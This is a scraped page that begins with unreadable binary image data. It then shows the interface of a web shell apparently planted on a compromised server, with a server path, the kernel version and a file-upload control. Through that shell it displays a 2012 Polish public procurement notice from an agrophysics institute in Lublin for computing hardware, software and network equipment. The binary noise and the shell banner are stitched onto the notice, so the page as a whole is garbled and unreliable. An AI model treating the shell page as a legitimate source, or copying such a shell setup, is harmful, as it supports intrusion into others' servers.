JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120525/173336-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa nowoczesnej infrastruktury informatycznej (klaster obliczeniowy, oprogramowanie, sieć LAN oraz stacje robocze) w Instytucie Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie służącej rozwojowi badań naukowych oraz współpracy w ramach ogólnopolskiej szerokopasmowej sieci optycznej nauki - PIONIER realizowana w ramach dotacji przyznanej przez Ministerstwo Nauki i Szkolnictwa Wyższego</b><br>
<b>Numer ogłoszenia: 173336 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie , ul. Doświadczalna 4, 20-290 Lublin, woj. lubelskie, tel. 081 7445061 w. 110, faks 081 7445067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/www.ipan.lublin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut naukowy Polskiej Akademii Nauk.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa nowoczesnej infrastruktury informatycznej (klaster obliczeniowy, oprogramowanie, sieć LAN oraz stacje robocze) w Instytucie Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie służącej rozwojowi badań naukowych oraz współpracy w ramach ogólnopolskiej szerokopasmowej sieci optycznej nauki - PIONIER realizowana w ramach dotacji przyznanej przez Ministerstwo Nauki i Szkolnictwa Wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa nowoczesnej infrastruktury informatycznej (klaster obliczeniowy, oprogramowanie, sieć LAN oraz stacje robocze) w Instytucie Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie służącej rozwojowi badań naukowych oraz współpracy w ramach ogólnopolskiej szerokopasmowej sieci optycznej nauki - PIONIER realizowana w ramach dotacji przyznanej przez Ministerstwo Nauki i Szkolnictwa Wyższego
Numeracja zgodnie z SIWZ: 
1.Przełącznik routujący Ethernet warstwy 2-3 - 1 szt.
Gwarancja minimum 1 rok
porty Ethernet 10-100-1000 Gb min. 48 portów
porty SFP+ 1000-10000 Gb	min. 4 porty 
przepustowość min. 119 Mp-s (przy 64-bajtowych pakietach)
prędkość przełączania min. 160 Gb-s
maksymalny rozmiar tabeli routingu min. 12000 pozycji
maksymalny rozmiar tabeli MAC min. 32000 pozycji
rozmiar bufora pakietów min. 1GB
1 szeregowy port konsoli RJ-45
1 port RJ-45 dedykowany do zdalnego zarządzania (out-of-band management)
możliwość zainstalowania dwóch zasilaczy redundantnych, jeden zasilacz w zestawie obudowa 1U przystosowana do montażu w szafie telekomunikacyjnej 19 
Obsługa routingu dla protokołów IPv4 i Ipv6 w tym: routingu statycznego oraz następujących protokołów routingu: RIP, BGP4+, IS-IS i OSPF
Możliwość konfiguracji zapory ogniowej (list ACL), co najmniej w oparciu o informacje i numerze IP nadawcy i odbiorcy, numeru portu źródłowego i docelowego, adresie MAC i rodzaju protokołu sieciowego.  
Możliwość kolejkowania ruchu sieciowego, w tym w oparciu w oparciu o listy ACL 
Możliwość zdalnej komunikacji z urządzeniem przy pomocy protokołu SSH
Obsługa dwóch poziomów dostępu przez oprogramowanie systemowe: operator (dostęp tylko do odczytu bez możliwości modyfikowania konfiguracji) i administrator (dostęp pełny)

2.Serwer - 1 szt.
Gwarancja producenta minimum 3 lata na całość łącznie z dyskami włączając robociznę i obsługę u klienta
Liczba procesorów	min. 2
Procesor - Liczba rdzeni min. 6
Procesor - Częstotliwość taktowania	min. 3.4 GHz
Procesor - Pojemność pamięci cache L3 min. 12 MB
RAM  - wielkość pamięci min. 12 GB
RAM - maksymalna możliwa pojemność pamięci obsługiwana przez płytę główną min. 192 GB
RAM - typ pamięci	ECC, RDIMM
Dyski SAS 2.5 300GB, 15k obrotów, hot swap 3 sztuki
Obudowa - możliwość zainstalowania 8 dysków SFF hot swap	
Kontroler RAID - cache min. 1GB
Kontroler RAID - interfejs dysków SAS 6Gb-s i SATA 3Gb-s
Kontroler RAID - obsługa RAID 0-1-1+0-5-5+0
Płyta główna - sloty rozszerzeń PCI-E 8x v.2.0 - min. 1szt., PCI-E 4x v.2.0 - min. 2 szt.
Płyta główna - zintegrowany interfejs Ethernet 10-100-1000 Gb-s	min. 4 szt.
Płyta główna - dedykowany odrębny port RJ54 do zarządzania serwerem 	1 sztuka
Płyta główna - zintegrowana karta graficzna	
Napęd DVD	
Dwa zasilacze redundantne	min. 750 W
Obudowa 2U przystosowana do montażu w szafie telekomunikacyjnej 19, szyny do montażu w zestawie
Panel diagnostyczny na obudowie wskazujący status (awaria-poprawne działanie) głównych podzespołów serwera, w tym: kart sieciowych, zasilaczy, procesorów, poszczególnych pamięci i wentylatorów. Obsługa wskazań zbyt wysokiej temperatury pracy serwera.

3. Zasilacz awaryjny - UPS - 1 szt.
Gwarancja producenta minimum 2 lata
Moc skuteczna 960 W
Moc pozorna 1600 VA
Kształt przebiegu sinus sinusoida przybliżona
Czas przełączania	max. 4 ms
Ilość gniazd wyjściowych min. 4 szt.
Interfejs komunikacyjny RS232 i oprogramowanie monitorujące stan zasilacza
Możliwość podłączenia dodatkowego zewnętrznego modułu baterii
Obudowa 3U przystosowana do montażu w szafie telekomunikacyjnej 19

4. Dyski do posiadanej półki dyskowej HP D2600 - 3 sztuki 
Gwarancja producenta minimum 1 rok.
Pojemność dysku 2TB
Prędkość obrotowa	min. 7200 obr.-min
Wielkość dysku 3.5 LFF
Interfejs dysku SAS 6Gb-s

5.Stacja robocza - 3 sztuki
Gwarancja producenta minimum 2 lata

Procesor	2 sztuki
Procesor - ilość rdzeni 6
Procesor - częstotliwość taktowania min. 3.4 GHz
Procesor - pamięć cache min. 12MB
Procesor - obsługa instrukcji 64 bitowych
Procesor - obsługiwany typ pamięci: DDR3-800-1066-1333
Procesor - Turbo Boost Technology i Hyper-Threading Technology
Płyta główna - Socket LGA1366
Płyta główna - Obsługiwane typy pamięci DDR3 UDIMM, RDIMM
Płyta główna -  Przepustowość pamięci 1333 GB-s
Płyta główna -  gniazda rozszerzeń min. 1 gniazdo PCIe x16 Gen 2.x
Płyta główna -  porty USB min. 4 porty USB 2.0
Płyta główna -  zintegrowana karta sieciowa	
RAM - DDR3-1333, DIMM Synchronous 1333 MHz min. 12 GB
Dysk - pojemność min. 1TB
Dysk - cache 64MB
Dysk - interfejs SATA 6.0Gb-s
Dysk - ilość obrotów 7200 obr.-min
Karta graficzna GPU obsługująca technologię CUDA 1 sztuka
GPU - częstotliwość taktowania rdzenia min. 800 MHz
GPU - częstotliwość taktowania jednostek cieniowania min. 1600 MHz
GPU - częstotliwość taktowania pamięci min. 4000 MHz
Napęd optyczny - 16X DVD-ROM SATA
Obudowa - rodzaj obudowy	Tower - Rack 5U
Obudowa - kieszenie 5.25 3 szt.
Obudowa - dodatkowe ciche wentylatory chłodzące 2 szt.
Zasilacz	min. 1100 W

6.Klaster obliczeniowy wraz z akcesoriami
a)Węzeł obliczeniowy klastra - 1 sztuka 
Minimum 3 lata gwarancji producenta
Liczba procesorów 	4
Procesor - Liczba rdzeni w procesorze	16
Procesor - Częstotliwość taktowania procesora 	min. 2.3 GHz
RAM - pojemność pamięci 512 GB
RAM - rodzaj pamięci DDR3, RDIMM
RAM - częstotliwość pracy min. 1333 MHz
Płyta główna - porty rozszerzeń 4 sztuki PCI-E Gen2 x16 (obsługa jednoczesnej pracy 2 portów x16 lub 4 portów x8)
Płyta główna - zintegrowany interfejs Ethernet 10-100-1000 Gb-s	4 sztuki
Płyta główna - dedykowany odrębny port RJ54 do zarządzania serwerem, pozwalający na zdalny dostęp w trybie -KVM over LAN- 1 sztuka
Płyta główna - zintegrowana karta graficzna	
Płyta główna - zintegrowany kontroler SATA min. 6 portów
Napęd DVD 1 sztuka
Dysk twardy SATA 1TB 7,2k obrotów-min, 3.5 1 sztuka
Dysk SSD, minimum 480GB, SATA 1 sztuka
Zasilacz  - moc min. 1600W
Zasilacz redundantny - dwa zasilacze w zestawie
Obudowa - 8 zatok dysków Hot-Swap, 3.5 
Obudowa - 2U przystosowana do montażu w szafie telekomunikacyjnej 19, szyny montażowe w zestawie
Karta graficzna GPU obsługująca technologię CUDA 2 sztuki
GPU - ilość RAM min. 1GB GDDR5
GPU - częstotliwość taktowania rdzenia min. 800 MHz
GPU - częstotliwość taktowania jednostek cieniowania min. 1600 MHz
GPU - częstotliwość taktowania pamięci min. 4000 MHz
GPU - możliwość łączenia dwóch GPU w celu uzyskania procesora o większej mocy obliczeniowej 
GPU - możliwości obliczeniowe minimum CUDA 2.1

b)Pamięć RAM do posiadanej stacji roboczej HP Z800 - 8 szt.
Gwarancja minimum 36 miesięcy
RAM - 8GB, 1333MHz, DDR3, ECC, Reg	8 sztuk

c)Pamięć RAM
Gwarancja minimum 36 miesięcy
RAM - 4GB, 1333MHz, DDR3, Non-ECC, CL9 DIMM 16 sztuk


d)Zestaw komputerowy - 1 szt.
Gwarancja 24 miesiące
1 Zestaw komputerowy - wymagania minimalne
1.1 Procesor: 3,3 GHz, 333 MHz, 2.5 GT-s,  L1: 2x32kB, L2: 6x512, L3: 3MB
1.2 Płyta główna: Ilość gniazd pamięci DDR III 4 szt.,  DDR3 2133(OC)-1866(OC)-1600-1333-1066 wielkość obsługiwanej pamięci 32 GB, PCI-Express x16 1 szt., PCI-Express x1 3 szt., Gniazdo PCI 3 szt., Zintegrowana karta dźwiękowa, 1 Gigabit LAN, Serial ATA 2 4 szt., Serial ATA 3 2 szt., eSATA 1 szt., Kontroler RAID SATA, USB zew. 6 szt., USB wew. 6 szt., 1 x COM , ATX
1.3 Karta sieciowa: Standard 10-100-1000 (Mbps) - 802.3ab Gigabit Ethernet, IEEE 802.3-802.3u-802.3ab-802.3x, PCI Express 1.0a - x1 PCI Express, IEEE 802.3-802.3u-802.3ab-802.3x, Obsługa Wake on LAN oraz ACPI
1.4 Dedykowana Karta graficzna:1024 MB, Typ pamięci DDR 5, 256 bit, taktowanie procesora 840 MHz, pamięci w 3D 4200 MHz, Obsługa wielu monitorów-2 
1.5 Dysk Twardy: 2 szt. - 3.5 cala, Sata III, 1000 GB, bufor: 64 MB, 7200 obr-min, 
1.6 Pamięć RAM: DDR3, 2x4096 MB, 1333 MHz, L9, gwarancja-wieczysta
1.7 Nagrywarka DVD: S-ATA odczyt CD 48 x, odczyt DVD (SL) 16 x, zapis CD-R 48x zapis DVD-R 24 x, czarna,  Dołączone oprogramowanie: do nagrywania płyt CD-DVD obrazów ISO, BIN, możliwość tworzenia płyt CD Audio, Video CD czy DVD Video, możliwość zgrania muzyki do formatu MP3 czy filmu DVD do DivX, 
1.8 Mysz komputerowa: Bezprzewodowa - wireless, błyskawiczne przewijanie, liczba przycisków - 8
1.9 Klawiatura komputerowa: Bezprzewodowa w paśmie 2,4 GHz, mały odbiornik, osiem klawiszy dostępu, gwarancja - 36 miesięcy
1.10 Obudowa: Wspierane formaty płyt głównych: mATX, ATX (CEB 1.01) i EATX (SSI EEB 3.x), sloty zew.: 4x 5,25 - 1x 3,5, sloty wew.: 5x 3,5 porty z przodu: 2x USB2.0, 1x IEEE 1394 Firewire, Mic-in, Audio-out (HD-Audio) Ilość slotów rozszerzeń: 7, wentylatory : 1x 120mm z tyłu, 4x 92mm na panelach bocznych (2 z lewej).
1.11 Zasilacz: Standard ATX 2.3, moc 550 W wtyczki: MOLEX 4 szt., S-ATA 4 szt. Floppy 1 szt.  ATX 12V 1 szt. ATX 12V (opis) 1 x 4-pin PCI-E 1 szt. zabezpieczenia UVP, OVP, OCP, OTP, OPP, OLP, SCP, NLO, PFP, TCP Ilość wentylatorów 1 szt. Głośność do 12 dB,  zgodność z -80PLUS BRONZE.
1.12 Kieszeń do twardego dysku 3.5 SATA 300, do montażu w szufladzie 5.25 obudowy PC:  gniazdo dokowania w obudowie PC: 5.25, zasilanie: 15 pinowy kabel SATA,dane: 7 pinowy kabel SATA, system montażu twardego dysku ze specjalnym mechanizmem Tool-Free, umożliwia włożenie twardego dysku wprost do ramki, bez konieczności montowania go w osobnej kieszeni. 100% hot-swapping. Dodatkowo w urządzeniu zastosowano opatentowany konektor NSS (Non-Scratch SATA
1.13 Kieszeń do dysków 2,5 SATAII: transfer do 3Gb-s, montaż w zatoce 3.5, złącza: 15 pinowy przewód zasilania SATA, 7 pinowy przewód danych SATA, szybki montaż dysku beż użycia narzędzi
1.14 4-portowy przełącznik KVMP USB: Połączenia z 4 komputerami , złącza: klawiatura- USB typu A(białe), grafika HDB-15(czarne), mysz-USB typu A(białe), głośnik- stereo, mini Jack, mikrofon-stereo mini jack. 
Porty KVM: klawiatura-grafika-mysz  4xSPHD-15, głośnik-mikrofon-4xmini jack.
Koncentrator  USB 2x USB. Dodatkowe porty: RJ11, zasilanie DC. Grafika 2048 x 1536; DDC2B.
1.15 Tester zasilaczy komputerowych:
20-24 (złącza ATX), Floppy, HDD, CD-ROM, S-ATA, 4-PIN (P4), 8-PIN (Dual-cpu), 6-PIN (PCI-EXPRESS).
Mierzone napięcia: +12V, -12V, +5V, -5V, +3V, -3V, 5V Stand By (SB), 12V Power Good (PG). Umożliwia sprawdzenie napięć dla zasilaczy ATX, BTX oraz ITX
wyświetlacz LCD, sygnalizacja dzwiękowa.
1.16 Fdd 1.44 mb zewnętrzny usb - czarny
1.17 Wewnętrzny czytnik kart pamięci i hub, montowany w zatokę 5,25:
Interfejs: Big-4Pin Molex
Ilość złącz kart: 6, 4x USB 2.0, 2x USB 3.0, 1x e-stata wejście mikrofonowe, słuchawkowe.
Obsługiwane wszystkie karty pamięci 
Oddzielne wejścia gniazd pamięci SD i Micro SD
Prędkość transmisji danych wynosi do 4.8 Gb-s
1.18 Monitor: 
Panoramiczny LCD z podświetleniem LED
Przekątna ekranu 24 cala
Natywna rozdzielczość ekranu wynosi 1920 x 1200 pikseli
czas reakcji matrycy to 8 ms
Proporcje wymiarów matrycy 16:10
Rodzaj matrycy IPS
Jasność jest na poziomie 300 cd-m2
Kontrast 2 000 000:1
Kąt widzenia [stopnie] 178 (poziom) , 178 (pion)
złącze analogowe D-SUB
cyfrowe DVI-D
USB 2.0 4 szt.
Zastosowane technologie: Plug - Play, HDCP
Pobór mocy [W] 38
przekątna 61 cm
Regulacja: wysokość, pochylenie, obrót (PIVOT)
Gwarancja 36 miesięcy
Załączone wyposażenie Przewód DVI, Przewód zasilający, Przewód D-Sub, Przewód USB
Normy i standardy: TCO03, Energy Star, EPEAT Gold
1.19 Zasilacz awaryjny (UPS): Wolnostojący moc skuteczna 600 W , czas podtrzymania przy 50% obciążeniu 13 min, przy 100% obciążeniu 3 min, czas przełączania 3 ms, sinusoida przybliżona, ilość gniazd wyjściowych 4 szt., gwarancja 24 miesiące.
1.21 System Operacyjny:
Najnowszy stabilny system operacyjny w języku polskim (64-bit), w pełni obsługujący pracę w domenie i kontrolę użytkowników w technologii ActiveDirectory, zcentralizowane zarządzanie oprogramowaniem i konfigurację systemu w technologii Group Policy.
Systemy operacyjne, zainstalowany na sprzęcie komputerowym objętym przedmiotem zamówienia musi być zgodny z posiadanym przez Zamawiającego. Zamawiający posiada oprogramowanie środowiska Microsoft.
1.22 Edytor tekstów - wersja edukacyjna:
Zainstalowane najnowsze stabilne oprogramowanie biurowe (64-bit)zawierające następujące elementy:
procesor tekstu, arkusz kalkulacyjny, program do prezentacji, w pełni wspierający formaty plików .docx, .xlsx, .pptx, język polski zawierający aplikację służącą do obsługi poczty elektronicznej i organizacji czasu oraz umożliwiającą współpracę z serwerem przy pomocy protokołu dostępu MAPI/RPC. Edytor tekstów, zainstalowany na sprzęcie komputerowym objętym przedmiotem zamówienia musi być zgodny z posiadanym przez Zamawiającego. Zamawiający posiada oprogramowanie środowiska Microsoft(MOLP).



e) Zestaw komputerowy - 1 szt.
Gwarancja 24 miesiące
2 Zestaw Komputerowy - wymagania minimalne
2.1 Procesor: 3.1 GHz, ilość Rdzeni: 2cache L3: 3 MB, gwarancja: 36 miesięcy
2.2 Płyta Główna: Ilość gniazd pamięci DDR III 2 szt., DDR3 1066-1333 DRAM Obsługiwana  pamięci 16 GB , PCI-Express x16 - 1 szt., PCI-Express x1 - 2 szt., Gigabit LAN, SATA 2 - 4 szt. SATA 3 - 2 szt., D-Sub -  1 szt.,  DVI - 1 szt., HDMI 1 szt, RJ45 1 szt., USB zew. - 6 szt., USB wew. - 4 szt. 2xUSB 3.0, 
2.3 Pamięci: DDR 3, 4 GB, 1333 MHz, CL9
2.4 Karta graficzna: PCI-Express, 1024 MB, DDR 5, 256 bit, 625 MHz, 3D 3600 MHz , obsługa wielu monitorów-2, DX10.1, OpenGL2.1, Shader Model 4.1 
2.5 Dysk twardy: 3,5 cala, SATA III, 500 GB cache 32 MB, 7200 obr-min-+-
2.6 Obudowa: Midi Tower ATX, zatoki: 5,25 zew. - 4 szt., 3,5zew.-1 szt., 5,25 wew.-5szt.. Sloty rozszerzeń-7 szt., 2xUSB, mikrofon, słuchawki. Wentylatory: przód 120 mm, tył 120 mm. Filtr przeciwkurzowy pod zasilacze. Gumowe podstawki (nóżki) absorbujące wibracje. Otwór do montażu chłodzenia procesora
2.7 Zasilacz: Moc 550 W, wtyczki: MOLEX 4 szt., S-ATA 4 szt., Floppy 1 szt., ATX 12V 1 szt., ATX 12V (opis) 2 x 4-pin (EPS 12V 8-pin),  PCI-E 2 szt..
2.8 Wewnętrzny czytnik kart pamięci i hub, montowany w zatokę 5,25:
Interfejs: Big-4Pin Molex
Ilość złącz kart: 6, 4x USB 2.0, 2x USB 3.0, 1x e-sata wejście mikrofonowe, słuchawkowe.
Obsługiwane wszyskie karty pamięci 
Odzielne wejścia gniazd pamięci SD i Micro SD
Prędkość transmisji danych wynosi do 4.8 Gb-s
2.9 Nagrywarka DVD: S-ATA odczyt CD 48 x, odczyt DVD (SL) 16 x, zapis CD-R 48x zapis DVD-R 24 x, czarna,  Dołączone oprogramowanie: do nagrywania płyt CD-DVD obrazów ISO, BIN, możliwość tworzenia płyt CD Audio, Video CD czy DVD Video, możliwość zgrania muzyki do formatu MP3 czy filmu DVD do DivX,
2.10 Mysz komputerowa: Laserowa, przewodowa, USB, rozdzielczość 1000 dpi, przyciski - 5 szt., błyskawiczne przewijanie
2.11 Klawiatura: Przewodowa, USB, podkładka pod nadgarstki, niskoprofilowanymi klawiszami
2.12 Monitor:
Typ matrycy IPS 
Podświetlenie matrycy LED 
Format obrazu 16:9 
Przekątna ekranu 21,5 cale 
Rozmiar plamki 0,248 mm 
Nominalna rozdzielczość 1920x1080 
Jasność 250 cd-m2 
Kontrast 5000000 :1  
Czas reakcji matrycy 5 ms 
Kąt widzenia w pionie 178 Stopni 
Kąt widzenia w poziomie 178 Stopni
Ilość wyświetlanych kolorów 16,7 mln 
Gniazdo D-Sub 1 szt. 
Gniazdo DVI-D 1 szt. 
2.13System Operacyjny:
Najnowszy stabilny system operacyjny w języku polskim (64-bit), w pełni obsługujący pracę w domenie i kontrolę użytkowników w technologii ActiveDirectory, zcentralizowane zarządzanie oprogramowaniem i konfigurację systemu w technologii Group Policy.
Systemy operacyjne, zainstalowany na sprzęcie komputerowym objętym przedmiotem zamówienia musi być zgodny z posiadanym przez Zamawiającego. Zamawiający posiada oprogramowanie środowiska Microsoft.
2.14	Edytor tekstów - wersja edukacyjna:
Zainstalowane najnowsze stabilne oprogramowanie biurowe (64-bit) zawierające następujące elementy:
procesor tekstu, arkusz kalkulacyjny, program do prezentacji, w pełni wspierający formaty plików .docx, .xlsx, .pptx, język polski zawierający aplikację służącą do obsługi poczty elektronicznej i organizacji czasu oraz umożliwiającą współpracę z serwerem przy pomocy protokołu dostępu MAPI-RPC. Edytor tekstów, zainstalowany na sprzęcie komputerowym objętym przedmiotem zamówienia musi być zgodny z posiadanym przez Zamawiającego. Zamawiający posiada oprogramowanie środowiska Microsoft(MOLP).


Pozostałe wymagania:
1. Niezależnie od uprawnień z tytułu gwarancji, Zamawiający może wykonywać uprawnienia z tytułu rękojmi na zasadach ogólnych z tym, że okres rękojmi jest równy okresowi gwarancji.
2. Wykonawca zobowiązany jest do dostarczenia wszystkich fabrycznie nowych urządzeń 
i materiałów niezbędnych do wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.10.00-1, 32.42.00.00-3, 32.41.31.00-2, 48.82.20.00-6, 48.82.21.00-0, 30.20.00.00-0, 30.23.41.00-9, 30.23.31.32-5, 30.21.40.00-2, 30.21.30.00-5, 30.23.71.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium 
1. Wadium należy wnieść w wysokości: 
5 000,00 zł (słownie: pięć tysięcy złotych) przed upływem terminu składania ofert .
2.   Zgodnie z art. 45 ust. 3 Ustawy Wykonawca zobowiązany jest do zapłaty wadium przed upływem terminu składania ofert. 
3.  Zabezpieczenie wadialne może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:
a. w pieniądzu -  przelewem na rachunek Zamawiającego :  
nr konta konto nr: 76 1130 1206 0028 9107 8990 0001
Bank Gospodarstwa Krajowego Oddział w Lublinie
ul. Dolna 3 Maja 3
20 - 079 Lublin
W przypadku wniesienia zabezpieczenia wadialnego przelewem w pieniądzu, decyduje data i godzina uznania kwotą wadium rachunku Zamawiającego.
b.  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej 
z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c. gwarancjach bankowych,
d.  gwarancjach ubezpieczeniowych,
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4.  Poręczenie lub gwarancja stanowiące formę zabezpieczenia wadium winno zawierać stwierdzenie, że nieodwołalnie, na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
z tytułu przepadku wadium w sytuacjach wymienionych w art. 46 ust. 4a i ust. 5 Ustawy, następuje jego bezwarunkowa wypłata (bez jakichkolwiek zastrzeżeń gwaranta-poręczyciela 
w treści dokumentu w stosunku do Zamawiającego) do wysokości sumy gwarancyjnej.
5. Zamawiający zaleca dołączenie do oferty dowodu wniesienia wadium (np. kopii przelewu). Jeżeli wadium ma formę gwarancji lub poręczenia, Zamawiający zaleca jego składanie 
w oryginale. Zamawiający wymaga złożenia oryginału gwarancji lub oryginału poręczenia 
w zakresie wniesienia wadium w przypadku, gdy pozostawienie oryginału w posiadaniu Wykonawcy może uniemożliwiać Zamawiającemu dochodzenie roszczeń przysługujących 
